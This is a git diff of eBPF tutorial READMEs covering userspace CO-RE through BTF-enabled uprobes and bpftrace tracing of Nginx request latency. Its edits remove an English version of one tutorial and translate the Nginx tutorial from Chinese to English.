/sys/kernel/debug/tracing/trace_pipe\ + <...>-25458 [000] ...11 27694.081465: bpf_trace_printk: add_test(&d) 1 + 3 = 4 +``` + +对于 `btf-base-new`: + +```sh +sudo ./uprobe examples/btf-base-new +``` + +同时也是用户空间程序: + +```console +$ examples/btf-base-new +add_test(&d) = 4 +``` + +但我们可以看到: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe\ + <...>-25809 [001] ...11 27828.314224: bpf_trace_printk: add_test(&d) 1 + 2 = 3 +``` + +结果是不同的,因为两个版本中的struct `data`是不同的。eBPF程序无法与不同版本的用户空间程序兼容,我们获取到了错误的结构体偏移量,也会导致我们追踪失败。 + +## 使用用户空间程序的BTF + +在`uprobe.bpf.c`中注释掉`#define BPF_NO_PRESERVE_ACCESS_INDEX` ,以确保eBPF程序可以以`struct data`的BTF编译。 + +```c +#define BPF_NO_GLOBAL_DATA +// #define BPF_NO_PRESERVE_ACCESS_INDEX +#include +#include +#include + +#ifndef BPF_NO_PRESERVE_ACCESS_INDEX +#pragma clang attribute push (__attribute__((preserve_access_index)), apply_to = record) +#endif + +struct data { + int a; + int c; + int d; +}; + +#ifndef BPF_NO_PRESERVE_ACCESS_INDEX +#pragma clang attribute pop +#endif + +SEC("uprobe/examples/btf-base:add_test") +int BPF_UPROBE(add_test, struct data *d) +{ + int a = 0, c = 0; + bpf_probe_read_user(&a, sizeof(a), &d->a); + bpf_probe_read_user(&c, sizeof(c), &d->c); + bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c); + return a + c; +} + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; +``` + +`struct data`的记录在eBPF程序中被保留下来。然后,我们可以使用 `btf-base.btf`来编译eBPF程序。 + +将用户btf与内核btf合并,这样我们就有了一个完整的内核和用户空间的btf: + +```sh +./merge-btf /sys/kernel/btf/vmlinux examples/base.btf target-base.btf +``` + +然后我们使用用户空间程序执行eBPF程序。 对于 `btf-base`: + +```console +$ sudo ./uprobe examples/btf-base target-base.btf +... +libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0 +libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4) +libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:1 @ offset 4) +libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 4 +... +``` + +执行用户空间程序并获取结果: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe +[sudo] password for yunwei37: + <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 +``` + +还可以对另一个版本的用户空间程序`btf-base-new`做同样的操作: + +```console +$ ./merge-btf /sys/kernel/btf/vmlinux examples/base-new.btf target-base-new.btf +$ sudo ./uprobe examples/btf-base-new target-base-new.btf +.... +libbpf: sec 'uprobe/examples/btf-base:add_test': found 3 CO-RE relocations +libbpf: CO-RE relocating [2] struct pt_regs: found target candidate [357] struct pt_regs in [vmlinux] +libbpf: prog 'add_test': relo #0: [2] struct pt_regs.di (0:14 @ offset 112) +libbpf: prog 'add_test': relo #0: matching candidate #0 [357] struct pt_regs.di (0:14 @ offset 112) +libbpf: prog 'add_test': relo #0: patched insn #0 (LDX/ST/STX) off 112 -> 112 +libbpf: CO-RE relocating [7] struct data: found target candidate [133110] struct data in [vmlinux] +libbpf: prog 'add_test': relo #1: [7] struct data.a (0:0 @ offset 0) +libbpf: prog 'add_test': relo #1: matching candidate #0 [133110] struct data.a (0:0 @ offset 0) +libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0 +libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4) +libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:2 @ offset 8) +libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 8 +libbpf: elf: symbol address match for 'add_test' in 'examples/btf-base-new': 0x1140 +Successfully started! Press Ctrl+C to stop. +``` + +结果是正确的: + +```console +$ sudo cat /sys/kernel/debug/tracing/trace_pipe +[sudo] password for yunwei37: + <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 +``` + +我们的 eBPF 追踪程序也几乎不需要进行任何修改,只需要把包含 kernel 和用户态结构体偏移量的 BTF 加载进来即可。这和旧版本内核上没有 btf 信息的使用方式是一样的: + +```c + LIBBPF_OPTS(bpf_object_open_opts , opts, + ); + LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts); + if (argc != 3 && argc != 2) { + fprintf(stderr, "Usage: %s []\n", argv[0]); + return 1; + } + if (argc == 3) + opts.btf_custom_path = argv[2]; + + /* Set up libbpf errors and debug info callback */ + libbpf_set_print(libbpf_print_fn); + + /* Cleaner handling of Ctrl-C */ + signal(SIGINT, sig_handler); + signal(SIGTERM, sig_handler); + + /* Load and verify BPF application */ + skel = uprobe_bpf__open_opts(&opts); + if (!skel) { + fprintf(stderr, "Failed to open and load BPF skeleton\n"); + return 1; + } +``` + +实际上,btf 实现重定向需要两个部分,一个是 bpf 程序带的编译时的 btf 信息,一个是内核的 btf 信息。在实际加载 ebpf 程序的时候,libbpf 会根据当前内核上准确的 btf 信息,来修改可能存在错误的 ebpf 指令,确保在不同内核版本上能够兼容。 + +有趣的是,实际上 libbpf 并不区分这些 btf 信息来自用户态程序还是内核,因此我们只要把用户态的重定向信息一起提供给 libbpf 进行重定向,问题就解决了。 + +本文的工具和完整的代码在 开源。 + +## 结论 + +- **灵活性和兼容性**:在用户空间eBPF程序中使用 BTF 大大增强了它们在不同版本的用户空间应用程序和库之间的灵活性和兼容性。 +- **简化了复杂性**:这种方法显著减少了维护不同版本的用户空间应用程序的eBPF程序的复杂性,因为它消除了需要多个程序版本的需要。 +- **更广泛的应用**:这种方法在性能监控、安全和用户空间应用程序的调试等方面也可能能有更广泛的应用。bpftime(https://github.com/eunomia-bpf/bpftime) 是一个开源的基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容。它在支持 uprobe、syscall trace 和一般的插件扩展的同时,避免了内核态和用户态之间的上下文切换,从而提高了 uprobe 程序的执行效率。借助 libbpf 和 btf 的支持,bpftime 也可以更加动态的扩展用户态应用程序,实现在不同用户态程序版本之间的兼容性。 + +这个示例展示了 eBPF 在实践中可以将其强大的 CO-RE 功能扩展到更动态地处理用户空间应用的不同版本变化。 + +如果你想了解更多关于eBPF知识和实践,你可以访问我们的教程代码库或者网站获得更多示例和完整教程。 diff --git a/src/38-btf-uprobe/README_en.md b/src/38-btf-uprobe/README_en.md deleted file mode 100644 index aa1a0e6..0000000 --- a/src/38-btf-uprobe/README_en.md +++ /dev/null @@ -1,313 +0,0 @@ -# Expanding eBPF Compile Once, Run Everywhere(CO-RE) to Userspace Compatibility - -> Yusheng - -eBPF, short for extended Berkeley Packet Filter, is a powerful and versatile technology used in modern Linux systems. It allows for the running of sandboxed programs in a virtual machine-like environment within the kernel, providing a safe way to extend the capabilities of the kernel without the risk of crashing the system or compromising security. - -Co-RE, standing for 'Compile Once, Run Everywhere', tackles the critical issue of eBPF program compatibility across diverse kernel versions. This feature allows eBPF programs to run on various kernel versions without the need for recompilation, simplifying deployment and maintenance. - -With eBPF Uprobe, you can also trace userspace applications and access their internal data structures. However, the CO-RE is not designed for userspace applications. This blog will introduce how to leverage CO-RE for user-space applications, ensuring eBPF Uprobe programs remain compatible across different application versions without the need for multiple compilations. - -This approach may be particularly beneficial for tracing applications like OpenSSL, where maintaining separate eBPF programs for each version is impractical. With userspace eBPF runtimes like bpftime, you can also expand the CO-RE to more usecases, including extensions, networking, and dynamic patching, providing versatile and efficient solutions. - -To implement the Co-RE feature of eBPF in user-space applications, we also need to utilize the BPF Type Format (BTF) to overcome some of the limitations of traditional eBPF programs. The key to this approach lies in providing user-space programs with similar type information and compatibility support as the kernel, thereby enabling eBPF programs to more flexibly handle different versions of user-space applications and libraries. - -This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [https://eunomia.dev/tutorials/](https://eunomia.dev/tutorials/). The source code is available on the [https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe). - -## Why we need CO-RE? - -- **Kernel Dependencies**: Traditional eBPF programs are tightly coupled with the specific Linux kernel version they are compiled for. This is because they rely on specific internal data structures and kernel APIs which can change between kernel versions. -- **Portability Issues**: If you wanted to run an eBPF program on different Linux systems with different kernel versions, you'd traditionally have to recompile the eBPF program for each kernel version, which is a cumbersome and inefficient process. - -### The Co-RE Solution - -- **Abstracting Kernel Dependencies**: Co-RE enables eBPF programs to be more portable by abstracting away specific kernel dependencies. This is achieved through the use of BPF Type Format (BTF) and relocations. -- **BPF Type Format (BTF)**: BTF provides rich type information about data structures and functions in the kernel. This metadata allows eBPF programs to understand the layout of kernel structures at runtime. -- **Relocations**: eBPF programs compiled with Co-RE support contain relocations that are resolved at load time. These relocations adjust the program's references to kernel data structures and functions according to the actual layout and addresses in the running kernel. - -### Advantages of Co-RE - -1. **Write Once, Run Anywhere**: eBPF programs compiled with Co-RE can run on different kernel versions without the need for recompilation. This greatly simplifies the deployment and maintenance of eBPF programs in diverse environments. -2. **Safety and Stability**: Co-RE maintains the safety guarantees of eBPF, ensuring that programs do not crash the kernel and adhere to security constraints. -3. **Ease of Development**: Developers don't need to worry about the specifics of each kernel version, which simplifies the development of eBPF programs. - -## Problem: userspace application CO-RE - -The eBPF also supports tracing userspace applications. Uprobe is a user-space probe that allows dynamic instrumentation in user-space programs. The probe locations include function entry, specific offsets, and function returns. - -The BTF is designed for the kernel and generated from vmlinux, it can help the eBPF program to be easily compatible with different kernel versions. - -The userspace application, however, also need CO-RE. For example, the SSL/TLS uprobe is widely used to capture the plaintext data from the encrypted traffic. It is implemented with the userspace library, such as OpenSSL, GnuTLS, NSS, etc. The userspace application and libraries also has different versions, it would be complex if we need to compile and maintain the eBPF program for each version. - -Let's see what will happen if CO-RE is not enabled for userspace applications, and how the BTF from userspace applications can solve this. - -## No BTF for userspace program - -This is a simple uprobe example, it can capture the function call and arguments of the `add_test` function in the userspace program. You can add `#define BPF_NO_PRESERVE_ACCESS_INDEX` in the `uprobe.bpf.c` to make sure the eBPF program can be compiled without BTF for `struct data`. - - -```c -#define BPF_NO_GLOBAL_DATA -#define BPF_NO_PRESERVE_ACCESS_INDEX -#include -#include -#include - -struct data { - int a; - int c; - int d; -}; - -SEC("uprobe/examples/btf-base:add_test") -int BPF_UPROBE(add_test, struct data *d) -{ - int a = 0, c = 0; - bpf_probe_read_user(&a, sizeof(a), &d->a); - bpf_probe_read_user(&c, sizeof(c), &d->c); - bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c); - return a + c; -} - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; -``` - -Then, we have two different versions of the userspace program, `examples/btf-base` and `examples/btf-base-new`. The struct `data` is different in the two versions. - -`examples/btf-base`: - -```c -// use a different struct -struct data { - int a; - int c; - int d; -}; - -int add_test(struct data *d) { - return d->a + d->c; -} - -int main(int argc, char **argv) { - struct data d = {1, 3, 4}; - printf("add_test(&d) = %d\n", add_test(&d)); - return 0; -} -``` - -`examples/btf-base-new`: - -```c -struct data { - int a; - int b; - int c; - int d; -}; - -int add_test(struct data *d) { - return d->a + d->c; -} - -int main(int argc, char **argv) { - struct data d = {1, 2, 3, 4}; - printf("add_test(&d) = %d\n", add_test(&d)); - return 0; -} -``` - -We can use pahole and clang to generate the btf for each version of userspace applications. The pahole tool can simply generate BTF from the debug info: - -make examples and generate btf for them: - -```sh -make -C example # it's like: pahole --btf_encode_detached base.btf btf-base.o -``` - -The we execute the eBPF program with the userspace program. for `btf-base`: - -```sh -sudo ./uprobe examples/btf-base -``` - -And also the userspace program: - -```console -$ examples/btf-base -add_test(&d) = 4 -``` - -We will see: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe\ - <...>-25458 [000] ...11 27694.081465: bpf_trace_printk: add_test(&d) 1 + 3 = 4 -``` - -For `btf-base-new`: - -```sh -sudo ./uprobe examples/btf-base-new -``` - -And also the userspace program: - -```console -$ examples/btf-base-new -add_test(&d) = 4 -``` - -But we will see: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe\ - <...>-25809 [001] ...11 27828.314224: bpf_trace_printk: add_test(&d) 1 + 2 = 3 -``` - -The result is different, because the struct `data` is different in the two versions. The eBPF program can't be compatible with different versions of the userspace program, so we cannot get the correct information. - -## Use BTF for userspace program - -Comment the `#define BPF_NO_PRESERVE_ACCESS_INDEX` in the `uprobe.bpf.c` to make sure the eBPF program can be compiled with BTF for `struct data`. - -```c -#define BPF_NO_GLOBAL_DATA -// #define BPF_NO_PRESERVE_ACCESS_INDEX -#include -#include -#include - -#ifndef BPF_NO_PRESERVE_ACCESS_INDEX -#pragma clang attribute push (__attribute__((preserve_access_index)), apply_to = record) -#endif - -struct data { - int a; - int c; - int d; -}; - -#ifndef BPF_NO_PRESERVE_ACCESS_INDEX -#pragma clang attribute pop -#endif - - -SEC("uprobe/examples/btf-base:add_test") -int BPF_UPROBE(add_test, struct data *d) -{ - int a = 0, c = 0; - bpf_probe_read_user(&a, sizeof(a), &d->a); - bpf_probe_read_user(&c, sizeof(c), &d->c); - bpf_printk("add_test(&d) %d + %d = %d\n", a, c, a + c); - return a + c; -} - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; -``` - -The record of `struct data` is preserved in the eBPF program. Then, we can use the `btf-base.btf` to compile the eBPF program. - -Merge user btf with kernel btf, so we have a complete btf for the kernel and userspace: - -```sh -./merge-btf /sys/kernel/btf/vmlinux examples/base.btf target-base.btf -``` - -Then we execute the eBPF program with the userspace program. for `btf-base`: - -```console -$ sudo ./uprobe examples/btf-base target-base.btf -... -libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0 -libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4) -libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:1 @ offset 4) -libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 4 -... -``` - -Execute the userspace program and get result: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe -[sudo] password for yunwei37: - <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 - -``` - -Also, we do the same for another version of the userspace program `btf-base-new`: - -```console -$ ./merge-btf /sys/kernel/btf/vmlinux examples/base-new.btf target-base-new.btf -$ sudo ./uprobe examples/btf-base-new target-base-new.btf -.... -libbpf: sec 'uprobe/examples/btf-base:add_test': found 3 CO-RE relocations -libbpf: CO-RE relocating [2] struct pt_regs: found target candidate [357] struct pt_regs in [vmlinux] -libbpf: prog 'add_test': relo #0: [2] struct pt_regs.di (0:14 @ offset 112) -libbpf: prog 'add_test': relo #0: matching candidate #0 [357] struct pt_regs.di (0:14 @ offset 112) -libbpf: prog 'add_test': relo #0: patched insn #0 (LDX/ST/STX) off 112 -> 112 -libbpf: CO-RE relocating [7] struct data: found target candidate [133110] struct data in [vmlinux] -libbpf: prog 'add_test': relo #1: [7] struct data.a (0:0 @ offset 0) -libbpf: prog 'add_test': relo #1: matching candidate #0 [133110] struct data.a (0:0 @ offset 0) -libbpf: prog 'add_test': relo #1: patched insn #4 (ALU/ALU64) imm 0 -> 0 -libbpf: prog 'add_test': relo #2: [7] struct data.c (0:1 @ offset 4) -libbpf: prog 'add_test': relo #2: matching candidate #0 [133110] struct data.c (0:2 @ offset 8) -libbpf: prog 'add_test': relo #2: patched insn #11 (ALU/ALU64) imm 4 -> 8 -libbpf: elf: symbol address match for 'add_test' in 'examples/btf-base-new': 0x1140 -Successfully started! Press Ctrl+C to stop. -``` - -The result is correct: - -```console -$ sudo cat /sys/kernel/debug/tracing/trace_pipe -[sudo] password for yunwei37: - <...>-26740 [001] ...11 28180.156220: bpf_trace_printk: add_test(&d) 1 + 3 = 4 -``` - -For complete source code, you can visit [https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/38-btf-uprobe) for more details. - -The eBPF uprobe tracing program almost doesn't need any modifications. We just need to load the BTF containing the offsets of kernel and user-space structures. This is the same usage as enabling CO-RE on older kernel versions without BTF information: - -```c - LIBBPF_OPTS(bpf_object_open_opts , opts, - ); - LIBBPF_OPTS(bpf_uprobe_opts, uprobe_opts); - if (argc != 3 && argc != 2) { - fprintf(stderr, "Usage: %s []\n", argv[0]); - return 1; - } - if (argc == 3) - opts.btf_custom_path = argv[2]; - - /* Set up libbpf errors and debug info callback */ - libbpf_set_print(libbpf_print_fn); - - /* Cleaner handling of Ctrl-C */ - signal(SIGINT, sig_handler); - signal(SIGTERM, sig_handler); - - /* Load and verify BPF application */ - skel = uprobe_bpf__open_opts(&opts); - if (!skel) { - fprintf(stderr, "Failed to open and load BPF skeleton\n"); - return 1; - } -``` - -In fact, the BTF implementation for relocation requires two parts: the compile-time BTF information carried by the BPF program, and the BTF information of the kernel when loading the eBPF program. When actually loading the eBPF program, libbpf will modify potentially incorrect eBPF instructions based on the accurate BTF information of the current kernel, ensuring compatibility across different kernel versions. - -Interestingly, libbpf does not differentiate whether these BTF information come from user-space programs or the kernel. Therefore, by merging the user-space BTF information with kernel BTF and provide them to libbpf, the problem is solved. - -And also, since the relocation is happened in userspace loader(like libbpf), both kernel eBPF runtime and userspace eBPF runtimes(Such as bpftime) can benefit from the CO-RE. bpftime () is an open-source user-space eBPF runtime based on LLVM JIT/AOT. It enables the execution of eBPF programs in user space, compatible with kernel-space eBPF. While supporting uprobes, syscall trace, and general plugin extensions, it avoids the context switching between kernel and user spaces, thereby enhancing the execution efficiency of uprobe programs. With the support of libbpf and BTF, bpftime can also dynamically extend user-space applications, achieving compatibility across different versions of user-space programs. - -For more details about BTF relocation, you may refer to - -## Conclusion - -- **Flexibility and Compatibility**: The use of BTF in user-space eBPF programs greatly enhances their flexibility and compatibility across different versions of user-space applications and libraries. -- **Reduced Complexity**: This approach significantly reduces the complexity involved in maintaining eBPF programs for different versions of user-space applications, as it eliminates the need for multiple program versions. -- **Potential for Broader Application**: While your example focused on SSL/TLS monitoring, this methodology may has broader applications in performance monitoring, security, and debugging of user-space applications. - -This example showcases a significant advancement in the practical application of eBPF, extending its powerful features to more dynamically handle user-space applications in a Linux environment. It's a compelling solution for software engineers and system administrators dealing with the complexities of modern Linux systems. - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/39-nginx/README.md b/src/39-nginx/README.md index 1fa4cf2..44ff33f 100644 --- a/src/39-nginx/README.md +++ b/src/39-nginx/README.md @@ -1,116 +1,114 @@ -# 使用 eBPF 跟踪 Nginx 请求 +# Using eBPF to Trace Nginx Requests -## 引言 +Nginx is one of the most popular web servers and reverse proxies in the world, known for its high performance, stability, and low resource consumption. It is widely used for serving static content, load balancing, and acting as a reverse proxy for dynamic applications. To maintain its performance edge, it's crucial to monitor and optimize Nginx's operations, especially when handling a large number of requests. One powerful way to gain insights into Nginx's performance is by using eBPF (Extended Berkeley Packet Filter). -Nginx 是世界上最流行的 Web 服务器和反向代理之一,以其高性能、稳定性和低资源消耗而闻名。它广泛用于提供静态内容、负载均衡以及作为动态应用的反向代理。为了保持其性能优势,监控和优化 Nginx 的运行尤为重要,尤其是在处理大量请求时。利用 eBPF(扩展的伯克利包过滤器),可以深入了解 Nginx 的性能表现,识别瓶颈并进行优化,而无需修改源代码或重启服务。 +eBPF is a revolutionary technology that allows developers to run custom programs in the Linux kernel. Originally designed for network packet filtering, eBPF has evolved into a versatile tool for tracing, monitoring, and profiling system behavior in both kernel and user space. By leveraging eBPF, you can trace Nginx's critical functions, measure latency, and identify bottlenecks without modifying the source code or restarting the service. -eBPF 是一项革命性技术,允许开发人员在 Linux 内核中运行自定义程序。最初设计用于网络数据包过滤,但 eBPF 现已发展为一个多功能工具,广泛应用于跟踪、监控和分析系统行为。通过利用 eBPF,您可以跟踪 Nginx 的关键函数,测量延迟,识别瓶颈,进而优化系统性能。 - -## 背景:Nginx 和 eBPF +## Background: Nginx and eBPF ### Nginx -Nginx 采用事件驱动架构,使其在资源占用极少的情况下能够高效处理成千上万的并发连接。这种高效性依赖于其请求处理、响应生成和事件处理等多个性能关键函数。了解这些函数在不同负载下的表现对于优化 Nginx 的使用至关重要。 +Nginx operates on an event-driven architecture, making it highly efficient and capable of handling thousands of simultaneous connections with minimal resources. This efficiency is achieved through various performance-critical functions involved in request processing, response generation, and event handling. Understanding how these functions behave under different loads is key to optimizing Nginx for your specific use case. ### eBPF -eBPF 程序在 Linux 内核的安全沙盒环境中运行。这些程序可以附加到各种钩子上,如系统调用、跟踪点,甚至可以通过 uprobes(用户级探针)附加到用户空间的函数。这使得 eBPF 成为一个强大的系统可观测性工具,可以收集详细的性能数据并实时执行策略。 +eBPF programs run in a secure, sandboxed environment within the Linux kernel. These programs can attach to various hooks, such as system calls, tracepoints, and even user-space functions via uprobes (user-level probes). This capability allows you to collect detailed performance data and enforce policies in real time, making eBPF an invaluable tool for system observability. -eBPF 的一个常见用例是跟踪函数执行时间,以测量延迟。这对于了解 Nginx 中特定函数的执行时间特别有用,有助于诊断性能问题、优化资源使用,并提高 Nginx 部署的整体效率。 +One common use case of eBPF is tracing function execution to measure latency, which is particularly useful for understanding how long specific Nginx functions take to execute. This information can help in diagnosing performance issues, optimizing resource usage, and improving the overall efficiency of your Nginx deployment. ### Uprobes -Uprobes 是一种用于跟踪用户空间应用程序函数的探针,它通过附加到特定用户空间函数的入口和出口点,可以捕获精确的时间信息。然而,需要注意的是,在内核模式 eBPF 运行时使用 uprobes 可能会带来一定的性能开销。为此,您可以考虑使用基于 LLVM JIT/AOT 的用户模式 eBPF 运行时 [bpftime](https://github.com/eunomia-bpf/bpftime)。这种运行时可以在用户空间中运行 eBPF 程序,与内核模式 eBPF 兼容,并有可能降低开销。 +Uprobes are a type of probe that can be used to trace functions in user-space applications, such as Nginx. They work by attaching to specific user-space function entry and exit points, allowing you to capture precise timing information. However, it’s important to note that using uprobes in the kernel mode eBPF runtime may cause some performance overhead. To mitigate this, you can consider using a user-mode eBPF runtime like [bpftime](https://github.com/eunomia-bpf/bpftime), which is based on LLVM JIT/AOT. This runtime can run eBPF programs in user space, offering compatibility with kernel mode eBPF while potentially reducing overhead. -## Nginx 的性能关键函数 +## Performance-Critical Functions in Nginx -以下是 Nginx 中一些性能关键的函数,可以通过 eBPF 进行监控: +Here are some key Nginx functions that are performance-critical and can be monitored using eBPF: -- **ngx_http_process_request**:负责处理传入的 HTTP 请求。监控此函数有助于跟踪请求处理的开始。 -- **ngx_http_upstream_send_request**:当 Nginx 作为反向代理时,负责向上游服务器发送请求。 -- **ngx_http_finalize_request**:完成 HTTP 请求的处理,包括发送响应。跟踪此函数可以衡量整个请求处理的时间。 -- **ngx_event_process_posted**:处理事件循环中的队列事件。 -- **ngx_handle_read_event**:负责处理来自套接字的读取事件,对监控网络 I/O 性能至关重要。 -- **ngx_writev_chain**:负责将响应发送回客户端,通常与写事件循环结合使用。 +- **ngx_http_process_request**: Processes incoming HTTP requests. Monitoring this function helps track the start of request handling. +- **ngx_http_upstream_send_request**: Handles sending requests to upstream servers when Nginx is acting as a reverse proxy. +- **ngx_http_finalize_request**: Finalizes HTTP request processing, including sending the response. Tracing this can measure total request handling time. +- **ngx_event_process_posted**: Processes queued events as part of the Nginx event loop. +- **ngx_handle_read_event**: Handles read events from sockets, crucial for monitoring network I/O performance. +- **ngx_writev_chain**: Sends responses back to the client, typically used in conjunction with the write event loop. -## 使用 bpftrace 跟踪 Nginx 函数 +## Using bpftrace to Trace Nginx Functions -为了监控这些函数,我们可以使用 `bpftrace`,一种 eBPF 的高级跟踪语言。以下是一个用于跟踪几个关键 Nginx 函数执行时间的脚本: +To monitor these functions, we can use `bpftrace`, a high-level tracing language for eBPF. Below is a script that traces the execution time of several critical Nginx functions: ```bt #!/usr/sbin/bpftrace -// 监控 HTTP 请求处理的开始 +// Monitor the start of HTTP request processing uprobe:/usr/sbin/nginx:ngx_http_process_request { - printf("HTTP 请求处理开始 (tid: %d)\n", tid); + printf("HTTP request processing started (tid: %d)\n", tid); @start[tid] = nsecs; } -// 监控 HTTP 请求的完成 +// Monitor when an HTTP request is finalized uretprobe:/usr/sbin/nginx:ngx_http_finalize_request /@start[tid]/ { $elapsed = nsecs - @start[tid]; - printf("HTTP 请求处理时间: %d ns (tid: %d)\n", $elapsed, tid); + printf("HTTP request processed in %d ns (tid: %d)\n", $elapsed, tid); delete(@start[tid]); } -// 监控向上游服务器发送请求的开始 +// Monitor the start of sending a request to an upstream server uprobe:/usr/sbin/nginx:ngx_http_upstream_send_request { - printf("开始向上游服务器发送请求 (tid: %d)\n", tid); + printf("Upstream request sending started (tid: %d)\n", tid); @upstream_start[tid] = nsecs; } -// 监控上游请求发送完成 +// Monitor when the upstream request is sent uretprobe:/usr/sbin/nginx:ngx_http_upstream_send_request /@upstream_start[tid]/ { $elapsed = nsecs - @upstream_start[tid]; - printf("上游请求发送完成时间: %d ns (tid: %d)\n", $elapsed, tid); + printf("Upstream request sent in %d ns (tid: %d)\n", $elapsed, tid); delete(@upstream_start[tid]); } -// 监控事件处理的开始 +// Monitor the start of event processing uprobe:/usr/sbin/nginx:ngx_event_process_posted { - printf("事件处理开始 (tid: %d)\n", tid); + printf("Event processing started (tid: %d)\n", tid); @event_start[tid] = nsecs; } -// 监控事件处理的完成 +// Monitor when event processing is completed uretprobe:/usr/sbin/nginx:ngx_event_process_posted /@event_start[tid]/ { $elapsed = nsecs - @event_start[tid]; - printf("事件处理时间: %d ns (tid: %d)\n", $elapsed, tid); + printf("Event processed in %d ns (tid: %d)\n", $elapsed, tid); delete(@event_start[tid]); } ``` -### 运行脚本 +### Running the Program -要运行上述脚本,先启动 Nginx,然后使用 `curl` 等工具生成 HTTP 请求: +To run the above script, start Nginx and use a tool like `curl` to generate HTTP requests: ```bt # bpftrace /home/yunwei37/bpf-developer-tutorial/src/39-nginx/trace.bt Attaching 4 probes... -事件处理开始 (tid: 1071) -事件处理时间: 166396 ns (tid: 1071) -事件处理开始 (tid: 1071) -事件处理时间: 87998 ns (tid: 1071) -HTTP 请求处理开始 (tid: 1071) -HTTP 请求处理时间: 1083969 ns (tid: 1071) -事件处理开始 (tid: 1071) -事件处理时间: 92597 ns (tid: 1071) +Event processing started (tid: 1071) +Event processed in 166396 ns (tid: 1071) +Event processing started (tid: 1071) +Event processed in 87998 ns (tid: 1071) +HTTP request processing started (tid: 1071) +HTTP request processed in 1083969 ns (tid: 1071) +Event processing started (tid: 1071) +Event processed in 92597 ns (tid: 1071) ``` -该脚本监控了几个 Nginx 函数的开始和结束时间,并打印了每个函数的执行时间。这些数据可以用来分析和优化 Nginx 服务器的性能。 +The script monitors the start and end times of various Nginx functions and prints the elapsed time for each. This data can be used to analyze and optimize the performance of your Nginx server. -## 测试 Nginx 的函数延迟 +## Testing Function Latency in Nginx -为了更详细地分析函数延迟,您可以使用 `funclatency` 工具,该工具可以测量 Nginx 函数的延迟分布。以下是如何测试 `ngx_http_process_request` 函数的延迟: +For a more detailed analysis of function latency, you can use the `funclatency` tool, which measures the latency distribution of Nginx functions. Here’s how to test the latency of the `ngx_http_process_request` function: ```console # sudo ./funclatency /usr/sbin/nginx:ngx_http_process_request @@ -128,22 +126,20 @@ Tracing /usr/sbin/nginx:ngx_http_process_request. Hit Ctrl-C to exit Exiting trace of /usr/sbin/nginx:ngx_http_process_request ``` -### 结果总结 +### Summary of Results -上述结果显示了 `ngx_http_process_request` 函数的延迟分布。大多数请求在 524,288 至 1,048,575 纳秒内处理完成,少部分请求处理时间更长。这些信息对于识别性能瓶颈和优化 Nginx 请求处理至关重要。 +The results above show the distribution of latency for the `ngx_http_process_request` function. The majority of requests were processed within 524,288 to 1,048,575 nanoseconds, with a smaller percentage taking longer. This information can be crucial in identifying performance bottlenecks and optimizing request handling in Nginx. -通过使用 `funclatency`,您可以: +By using `funclatency`, you can: -- **识别性能瓶颈**:了解哪些函数执行时间最长,并将优化工作重点放在这些函数上。 -- **监控系统性能**:定期监控函数延迟,确保在高负载下 Nginx 服务器的最佳性能。 -- **优化 Nginx 配置**:利用延迟测量得出的洞察调整 Nginx 设置或修改应用程序,以提高整体性能。 +- **Identify Performance Bottlenecks**: Understand which functions are taking the most time to execute and focus your optimization efforts there. +- **Monitor System Performance**: Regularly monitor function latency to ensure your Nginx server is performing optimally, especially under heavy load. +- **Optimize Nginx Configuration**: Use the insights gained from latency measurements to tweak Nginx settings or modify your application to improve overall performance. -您可以在 [bpf-developer-tutorial 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency) 中找到 `funclatency` 工具。 +You can find the `funclatency` tool in the [bpf-developer-tutorial repository](https://github.com/eunomia-bpf/bpf-developer-tutorial/blob/main/src/33-funclatency). -## 结论 +## Conclusion -通过 eBPF 跟踪 Nginx 请求可以为您的 Web 服务器提供宝贵的性能洞察,使您能够监控、分析和优化其操作。使用 `bpftrace` 和 `funclatency` +Tracing Nginx requests with eBPF provides valuable insights into the performance of your web server, allowing you to monitor, analyze, and optimize its operation. By using tools like `bpftrace` and `funclatency`, you can measure function execution times, identify bottlenecks, and make data-driven decisions to improve your Nginx deployment. - 等工具,您可以测量函数执行时间、识别瓶颈,并根据数据做出决策来改进 Nginx 部署。 - -如果您有兴趣了解更多关于 eBPF 的知识,包括更多高级示例和教程,请访问我们的 